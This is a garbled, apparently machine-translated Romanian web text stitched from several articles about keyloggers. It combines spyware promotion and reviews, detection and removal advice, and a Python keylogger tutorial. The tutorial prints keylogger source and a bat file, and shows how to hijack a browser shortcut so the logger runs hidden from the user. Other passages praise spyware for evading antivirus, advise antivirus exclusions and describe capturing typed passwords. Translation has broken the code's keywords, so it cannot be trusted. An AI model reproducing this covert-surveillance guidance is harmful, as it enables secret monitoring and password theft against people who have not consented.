Program de spionaj pentru tastatură. Pentru ce este folosit un keylogger? Alte mijloace de atac

Pentru ce sunt folosite keylogger-urile (keylogger):
1. Controlul copiilor și al celor dragi
Spyrix Keylogger Free vă permite să monitorizați utilizarea computerului copiilor dvs. Îți vei proteja copiii de informațiile nedorite de pe Internet (sex, droguri, sinucidere, jocuri de noroc etc.) și îi vei proteja de contactele cu persoane periculoase.
2. Controlul și protecția angajaților împotriva scurgerilor de informații.
Spyrix Keylogger Free poate fi folosit pentru a monitoriza corespondența angajaților pe computerele de serviciu și pentru a controla utilizarea timpului de lucru.
Principalele caracteristici ale Spyrix Keylogger Free:

• NOU! Monitorizare de la distanță prin cont web securizatEste suficient să accesezi computerul pe care vrei să-l monitorizezi o dată și să instalezi acolo programul Spyrix Keylogger Free. În viitor, veți putea vizualiza informațiile colectate prin contul dvs. web din orice loc unde există Internet și orice dispozitiv (computer, laptop, tabletă sau smartphone).
• Keylogger (keylogger)Înregistrarea informațiilor despre tastele apăsate de pe tastatură într-un fișier jurnal (salvează chiar și caracterele șterse)
• 100% nedetectabil de programele antivirusAplicațiile antivirus și antispyware detectează și blochează adesea multe dintre aceste aplicații. Spyrix Keylogger Free este perfect ascuns de programele antivirus, anti-rootkit-uri și software-ul anti-spyware.
• Dezinstalare de la distanțăPuteți elimina Spyrix Keylogger Free de pe computerul dorit de la distanță printr-un cont web.
• Urmărirea aplicațieiVizualizați toate aplicațiile care rulează, inclusiv jocurile
• Capturi de ecran (capturi de ecran)Crearea de capturi de ecran extinde semnificativ capacitățile de monitorizare a computerului și vă permite să faceți fotografii ale ferestrelor oricăror aplicații (inclusiv ICQ, SKYPE etc.) și site-uri web (de exemplu, vkontakte, Odnoklassniki)
• Activitatea utilizatoruluiSpyrix Keylogger Free va înregistra timpul de utilizare a computerului activ și inactiv
• Controlul unităților amovibile (USB, HDD, SD)
• Controlul imprimantei

Spyrix Keylogger Free este cel mai puternic keylogger gratuit de pe piață. Spyrix Keylogger Free este singurul keylogger cu adevărat gratuit care oferă funcționalitate de monitorizare de la distanță.

Fereastra principala:

Cont web securizat:


Expert setări:

Cum să cauți keylogger

Indiferent cât de vicleni sunt keyloggerii, aceștia pot fi încă detectați. Există mai multe moduri.

• Căutați după semnături

Această metodă vă permite să determinați cu precizie prezența keyloggerilor, alegerea corectă a semnăturilor poate reduce probabilitatea unei erori la zero. Dar un scanner de semnături este capabil să detecteze obiecte care sunt deja cunoscute și descrise în baza sa de date, așa că aceasta necesită ca baza de date să fie mare și actualizată constant.

• Algoritmi euristici

Această metodă găsește un keylogger pe baza caracteristicilor sale caracteristice și vă permite să detectați capcanele standard ale tastaturii. Cercetările au arătat că sute de programe benigne, non-keylogger, stabilesc capcane pentru a urmări introducerea mouse-ului și a tastaturii. De exemplu, binecunoscutul program Punto Switcher, software pentru tastaturi și mouse-uri multimedia.

• Monitorizarea funcțiilor API utilizate de spioni

Metoda se bazează pe interceptarea unui număr de funcții utilizate de keylogger, cum ar fi SetWindowsHookEx, UnhookWindowsHookEx, GetAsyncKeyState, GetKeyboardState.

Urmărirea driverelor, proceselor, serviciilor utilizate de sistem

Metoda este potrivită nu numai pentru urmărirea keylogger-urilor. Cel mai simplu caz de utilizare este utilizarea unui program precum Kaspersky Inspector, care monitorizează apariția fișierelor noi în sistem.

Cum să te protejezi de keyloggeri

Adesea, keylogger-urile cunoscute au fost deja adăugate la baza de date și, prin urmare, metoda de protecție este aceeași ca împotriva oricărui software rău intenționat:

• Instalarea unui produs antivirus;
• Mentinerea unei baze de date la zi.

Este de remarcat faptul că majoritatea programelor antivirus clasifică keylogger-urile ca software potențial periculos și aici este necesar să clarificăm că în setările implicite produsul antivirus detectează prezența acestui tip de program. Dacă nu, atunci ar trebui să faceți setările manual pentru a vă proteja de cele mai comune programe spyware.

În general, deoarece keylogger-urile au ca scop spionarea datelor confidențiale, ar trebui să recurgeți la următoarele metode de securitate:

Utilizarea parolelor unice/autentificarea cu doi factori

Utilizarea sistemelor proactive de apărare, care vă permite să avertizați utilizatorul despre instalarea/activarea programelor keylogger

Folosind tastatura virtuală, care reprezintă tastatura pe ecran ca o imagine, vă permite să vă protejați atât de spionii software, cât și de hardware.

Găsirea și eliminarea keylogger-urilor

Care sunt modalitățile de a te proteja de acest spirit rău?

• Orice program antivirus
• Utilități cu semnături și mecanisme de căutare euristică (de exemplu, AVZ).
• Utilități și programe care vizează detectarea keylogger-urilor și blocarea activității acestora. Această metodă de protecție este cea mai eficientă, deoarece acest software, de regulă, blochează aproape toate tipurile de keylogger.

Este demn de remarcat faptul că software-ul care vizează capturarea keyloggerilor are două caracteristici: software-ul de acest tip este în mare parte plătit, iar limba rusă este rar prezentă.

De exemplu, software-ul gratuit în limba engleză Advanced Spyware Remover scapă de adware, apelanți, spyware, keylogger etc.

Instalarea este standard, ar trebui să faceți clic pe „Următorul”, este dificil să faceți o greșeală. După instalare, vi se solicită să rulați programul. Pentru a scana, faceți clic pe „Scanați acum”.

Cu toate acestea, este de remarcat faptul că programul nu a fost actualizat de 3 ani.

În general, acest program verifică registrul de sistem pentru prezența cheilor de malware în el. Utilitarul are anumite funcționalități, permițându-vă astfel să afișați o listă de programe încărcate atunci când sistemul de operare pornește („HiJack Scan→Startup“), să afișați o listă de servicii, să afișați porturile active, să vizualizați cookie-uri Internet Explorer etc. După scanare, va apărea o fereastră similară:

Dacă acordați atenție ceva mai proaspăt, puteți utiliza Spyware Terminator 2012 (deși nu gratuit). Utilitarul este capabil să detecteze și să elimine aproape toate tipurile de malware. Sistemul de securitate încorporat activează protecția aplicațiilor și a sistemului și monitorizează utilitățile care interacționează direct cu rețeaua.

• interceptarea clipboard-ului,
• interceptarea tastelor,
• interceptarea textului din Windows

și mult mai mult. Anti-keylogger nu folosește baze de date de semnături, deoarece se bazează doar pe algoritmi euristici. Anti-keylogger este capabil să protejeze împotriva atacurilor direcționate, care sunt foarte periculoase și populare printre infractorii cibernetici. Este deosebit de eficient în lupta împotriva keylogger-urilor pe baza utilizării capcanelor, a sondajului ciclic și a unui driver de filtru pentru tastatură.

Anti-keylogger are o opțiune gratuită, limitată de timpul de utilizare - 10 sesiuni de lucru, fiecare cu durata de 2 ore, ceea ce este suficient pentru a vă verifica computerul la un moment dat.

Deci, ce avem:

1. Keylogger-urile sunt comercializate ca software legitim, dar multe dintre ele pot fi folosite pentru a fura informațiile personale ale utilizatorilor.
2. Astăzi, keylogger-urile, împreună cu phishingul etc., au devenit una dintre principalele metode de fraudă electronică.
3. A existat o creștere a numărului de programe malware cu funcționalitate keylogger.
4. Distribuția de keylogger software bazate pe tehnologii rootkit, ceea ce le face invizibile pentru utilizator și scanere antivirus.
5. Detectarea spionajului folosind keylogger necesită utilizarea unor instrumente de securitate specializate.
6. Nevoia de protecție pe mai multe niveluri (produse antivirus cu funcția de detectare a software-ului periculos, instrumente de protecție proactivă, tastatură virtuală).

Lasă comentariul tău!

Cum poți afla ce face copilul sau angajatul tău pe computer? Ce site-uri vizitează, cu cine comunică, ce și cui scrie?

În acest scop, există programe de spionaj - un tip special de software care, neobservat de utilizator, colectează informații despre toate acțiunile sale. Software-ul de spionaj va rezolva această problemă.

Spyware-ul pentru computer nu trebuie confundat cu un troian: primul este absolut legitim și este instalat cu cunoștințele administratorului, al doilea intră ilegal pe computer și desfășoară activități rău intenționate ascunse.

Cu toate acestea, hackerii pot folosi și programe de urmărire legitime.

Aplicațiile spyware sunt cel mai adesea instalate de managerii de afaceri și administratorii de sistem pentru a monitoriza angajații, părinții pentru a spiona copiii, soții geloși etc. În același timp, „victima” poate ști că este monitorizată, dar cel mai adesea nu o face. stiu.

Revizuirea și compararea a cinci programe spyware populare

NeoSpy

NeoSpy este un program universal de spionaj pentru tastatură, ecran și activitatea utilizatorului. NeoSpy funcționează invizibil și își poate ascunde prezența chiar și în timpul instalării.

Utilizatorul care instalează programul are posibilitatea de a alege unul dintre cele două moduri de instalare - administrator și ascuns. În primul mod, programul este instalat în mod deschis - creează o comandă rapidă pe desktop și un folder în directorul Fișiere program, în al doilea - ascuns.

Procesele programului nu apar în Managerul de activități Windows și în managerii de activități terță parte.

Funcționalitatea NeoSpy este destul de largă și programul poate fi folosit atât ca monitorizare acasă, cât și în birouri pentru monitorizarea angajaților.

Programul de spionaj este distribuit în trei versiuni sub o licență shareware. Prețul este de 820-1990 de ruble, dar poate funcționa și gratuit (chiar și în modul ascuns) cu restricții la vizualizarea rapoartelor.

Ce poate face NeoSpy:

• monitorizați tastatura;
• monitorizarea vizitelor site-ului web;
• afișați ecranul utilizatorului în timp real prin internet de pe un alt computer sau tabletă;
• faceți capturi de ecran și salvați imagini de pe camera web;
• monitorizați evenimentele sistemului (pornire, oprire, timp de nefuncționare a computerului, conectarea mediilor amovibile);
• interceptați conținutul clipboard-ului;
• Monitorizați utilizarea mesageriei instantanee pe Internet, înregistrați apelurile Skype;
• interceptarea datelor trimise pentru tipărire și copiate pe suporturi externe;
• păstrează statistici ale lucrului la calculator;
• trimite coordonatele laptopului (calculate prin Wi-Fi).

Datorită interfeței în limba rusă, unei game largi de funcții, interceptării corecte a tastaturii și unui mod de operare complet ascuns în sistem, NeoSpy primește ratingul maxim atunci când alege programe pentru controlul utilizatorului.

Monitor spion real

Următorul spion este Real Spy Monitor. Acest program în limba engleză nu are doar funcții de urmărire, dar poate și bloca anumite acțiuni pe computer. Prin urmare, este adesea folosit ca instrument de control parental.

Pentru fiecare cont din setările Real Spy Monitor, vă puteți crea propria politică de interzicere, de exemplu, pentru vizitarea anumitor site-uri.

Din păcate, din cauza lipsei unei interfețe în limba engleză, este mai greu de înțeles funcționarea Real Spy Monitor, în ciuda miniaturilor grafice pentru butoane.

Programul este si platit. Licența costă de la 39,95 USD.

Caracteristicile monitorului real spion:

• interceptarea tastelor, conținutului clipboard-ului, evenimentelor de sistem, site-urilor web, mesagerie instant, e-mail;
• lucru în modul semi-ascuns (fără o fereastră activă, dar cu procesul afișat în managerul de activități);
• lucrul cu mai multe conturi;
• rulare automată selectivă pentru diferite conturi.

În general, mulți utilizatori ca Real Spy Monitor, dezavantajele includ costul ridicat, lipsa unei interfețe în limba rusă și afișarea procesului în managerul de activități.

Adevărat spion

Dezvoltatorii poziționează Actual Spy ca un keylogger (keylogger), deși programul poate face mai mult decât să înregistreze apăsările de taste.

Monitorizează conținutul clipboard-ului, face capturi de ecran, monitorizează vizitele site-ului și alte lucruri care sunt incluse în setul principal de spioni pe care l-am examinat.

Când este instalat, Actual Spy creează o comandă rapidă în meniul Start, astfel încât să poată fi observat de utilizator. Lansarea are loc și în mod deschis - pentru a ascunde fereastra programului trebuie să apăsați anumite taste.

Capacitățile lui Actual Spy nu sunt foarte diferite de cele ale concurenților săi. Printre deficiențe, utilizatorii au remarcat că înregistrează corect apăsările de taste numai în aspectul englezesc.

SpyGo

SpyGo - kit de spionaj pentru uz casnic. Poate fi folosit și în birouri pentru a monitoriza angajații.

Pentru a începe monitorizarea, faceți clic pe butonul „Start” din SpyGo.

SpyGo este distribuit sub o licență shareware și costă 990-2990 de ruble, în funcție de setul de funcții.

În versiunile de încercare, durata monitorizării este limitată la 20 de minute pe zi, iar trimiterea rapoartelor către e-mail și FTP nu este, de asemenea, disponibilă.

Principalele caracteristici ale SpyGo:

• monitorizarea tastei;
• înregistrarea tuturor acțiunilor pe computer (lansare de programe, operații cu fișiere etc.);
• controlul vizitelor la resursele web (istoric, interogări de căutare, site-uri vizitate frecvent, durata șederii pe site);
• înregistrarea a ceea ce se întâmplă pe ecran;
• salvarea conținutului clipboard-ului;
• ascultarea mediului (dacă există microfon);
• monitorizarea evenimentelor de sistem (timp de pornire și oprire a computerului, timp de nefuncționare, conectare unități flash, discuri etc.).

Important! Dezavantajele SpyGo, conform utilizatorilor, includ faptul că nu acceptă toate versiunile de Windows, la trimiterea rapoartelor aruncă adesea erori și se demască destul de ușor.

Snitch

Snitch - numele acestui program se traduce prin „snitch” și este foarte neprietenos cu utilizatorul. Snitch spioni asupra activităților computerizate. Funcționează ascuns, nu necesită setări complexe și are un efect redus asupra performanței sistemului.

Programul este lansat într-o singură versiune.

Caracteristici și caracteristici ale Snitch:

• Monitorizarea tastaturii, clipboard-ului, evenimentelor de sistem, navigarea pe web și comunicarea prin mesagerie instantanee;
• compilarea de rapoarte de sinteză și grafice ale evenimentelor monitorizate;
• configurație nepretențioasă a rețelei;
• protecție împotriva încetării neautorizate a procesului programului;
• supravegherea se realizează chiar și în absența accesului la rețea.

Printre deficiențe, puteți observa conflicte cu antivirusurile

Cum să detectezi un spion pe computerul tău?

Găsirea programelor spion pe un computer care nu se afișează în exterior este dificilă, dar nu imposibilă.

Deci, în ciuda legitimității lor, aplicațiile pe care le-am analizat poate fi recunoscut de antivirusuri speciale,„personalizat” pentru căutarea de spyware (troieni cu funcții de spionaj), așa că vă recomandăm să adăugați programul instalat la lista de excludere a unor astfel de antivirusuri.

Și dacă nu trebuie să eliminați spionul, ci trebuie doar să vă ascundeți acțiunile din acesta, puteți utiliza instrumente antispionaj care, în ciuda faptului că vă spionează în mod activ, vor împiedica interceptarea evenimentelor de la tastatură și a capturilor de ecran.

Atunci corespondența și parolele dvs. nu vor cădea în mâini greșite.

Bună, QUAZAR este din nou aici. Astăzi vă voi arăta cum să creați un keylogger simplu în Python. Desigur, acest keylogger nu poate concura cu asemenea giganți, dar, în ciuda acestui fapt, își poate găsi folosirea.

Ce este un keylogger?

Puteți citi în detaliu despre ce este un keylogger și despre tipurile de keylogger în articolul „“. Pentru a găsi materiale suplimentare pe această temă, utilizați căutarea pe site, care se află în colțul din dreapta sus. Trebuie doar să introduceți cuvântul „keylogger” sau „keylogger”.

Keylogger simplu în Python

Pentru a crea un keylogger avem nevoie de:

• Sistem de operare: Windows sau MacOs (se poate folosi orice Linux, dar nu l-am încercat personal)
• Python instalat pe mașina țintă, precum și biblioteci speciale.

Acest material are doar scop informativ. Informațiile prezentate în acest articol sunt furnizate doar în scop informativ. Nici editorii site-ului www.site, nici autorul publicației nu poartă nicio responsabilitate pentru orice prejudiciu cauzat de materialul din acest articol.

Crearea unui Keylogger simplu în Python

Mai întâi trebuie să descărcați și să instalați Python.

După instalarea Python, trebuie să instalați modulele „pyHook” și „pywin32”. Pe acest site veți găsi versiuni pe 32 și 64 de biți pentru Windows și alte sisteme de operare. Descărcați „PYhook” și „pyWin32” în funcție de versiunea dvs. instalată de Python și Windows (32 de biți sau 64 de biți).

Odată descărcat, instalați și deschideți meniul IDLE (Python GUI) din meniul Start.

Accesați meniul „Fișier” și faceți clic pe elementul „Fișier nou”. Apoi lipiți codul keylogger:

#Nume: QUAZAR
#Site web: www.site
import pyHook, pythoncom, sys, logare
file_log = "C:keyloggerlog.txt"
def OnKeyboardEvent(eveniment):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format="%(message)s")
chr(eveniment.Ascii)
logging.log(10,chr(event.Ascii))
returnează Adevărat
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

Și salvați-l apelând fișierul Keylogger.pyw. Doar nu salvați fișierul în directorul rădăcină C: unde aveți nevoie de drepturi de administrator pentru a copia și șterge fișiere. Creați un folder nou pe unitatea dvs. C: sau într-o altă locație în care nu aveți nevoie de drepturi de administrator pentru a copia fișiere și a salva acolo Keylogger.pyw.

Puteți selecta orice locație ca fișier de raport de ieșire „file_log = „C:keyloggerlog.txt”, dar de preferință, desigur, o locație ascunsă pe hard disk. În acest exemplu, voi salva fișierul raport pe disc în directorul rădăcină C:. La urma urmei, nu am nimic de ascuns.

Lansarea automată a unui keylogger în Python

Keylogger-ul este gata. Acum trebuie să ne asigurăm că keyloggerul pornește ascuns utilizatorului și automat când Windows pornește. Acest lucru poate fi implementat în diferite moduri. Să încercăm să o facem folosind un fișier bat, legând lansarea keylogger-ului la un program sau înregistrându-l la pornire.

Mai întâi, creați un fișier bat. Copiați și inserați următorul cod în Notepad:

::Nume: QUAZAR
::Site web: www.site
@echo dezactivat
începe "" "C:keyloggerkeylogger.pyw"
porniți "" "C:Program FilesOperalauncher.exe"

În prima linie trebuie să introduceți calea către fișierul keylogger.pyw (în cazul meu „C:keylogger.pyw”). În a doua linie, trebuie să introduceți calea către programul pe care îl folosește de obicei utilizatorul (în cazul meu, browserul Opera).

După editare, salvați fișierul cu extensia .bat (în cazul meu logger.bat) într-o locație ascunsă de pe computer (în cazul meu în „C:keylogger.bat”).

Acum mergeți la desktop și selectați o comandă rapidă pentru un program folosit frecvent (în cazul meu, acesta este browserul Opera). Faceți clic dreapta pe mouse pentru a apela meniul contextual și accesați proprietățile comenzii rapide. În câmpul „Obiect”, introduceți calea către fișierul bat keylogger „C:keyloggerlogger.bat”.

După efectuarea modificărilor, pictograma comenzii rapide se va schimba și ea. Dar acest lucru poate fi rezolvat cu ușurință în fila de proprietăți (vezi captura de ecran de mai sus).

Keylogger este un program care citește tastele apăsate și le salvează într-un fișier. Pe viitor, puteți vedea ce a scris persoana la computer, ce mesaje a tastat și ce parole a introdus. Un alt nume pentru un keylogger este un keylogger, din limba engleză „keylogger”, care înseamnă literal „butoane de înregistrare”.

În programul NeoSpy, funcția keylogger este activată în mod implicit, în acest mod, programul înregistrează text, combinații de taste rapide și parole tastate pe tastatură; Gestionarea setărilor keylogger se află în meniul „Setări de urmărire” - „Înregistrare jurnal” - „Tastatură”. Puteți alege unul dintre cele două moduri de operare ale programului: standard și alternativ. Este recomandat să utilizați opțiunea standard în 99% din timp, dar dacă există un conflict cu software-ul antivirus, puteți activa modul alternativ.

Configurarea unui keylogger

Jurnalul de la tastatură este întotdeauna înregistrat în format complet, inclusiv cheile de serviciu. Un exemplu de astfel de jurnal poate fi văzut în ilustrație. Când vizualizați raportul, puteți dezactiva afișarea caracterelor neprintabile și puteți vizualiza jurnalul ca text simplu, mai accesibil pentru citire gratuită.

Pentru a simplifica lucrul cu rapoarte, parolele tastate sunt evidențiate în lista de apăsări de taste. Astfel poți afla parolele copilului tău și, dacă este necesar, să-l protejezi de cunoștințe nedorite. Dacă programul NeoSpy este utilizat într-o întreprindere pentru a monitoriza angajații, atunci colectarea datelor cu caracter personal și a corespondenței este interzisă de legislația majorității țărilor, astfel încât această opțiune trebuie dezactivată sau angajatul trebuie să fie notificat în scris despre controlul de către conducere și inadmisibilitatea utilizării computerului în organizație pentru corespondența personală.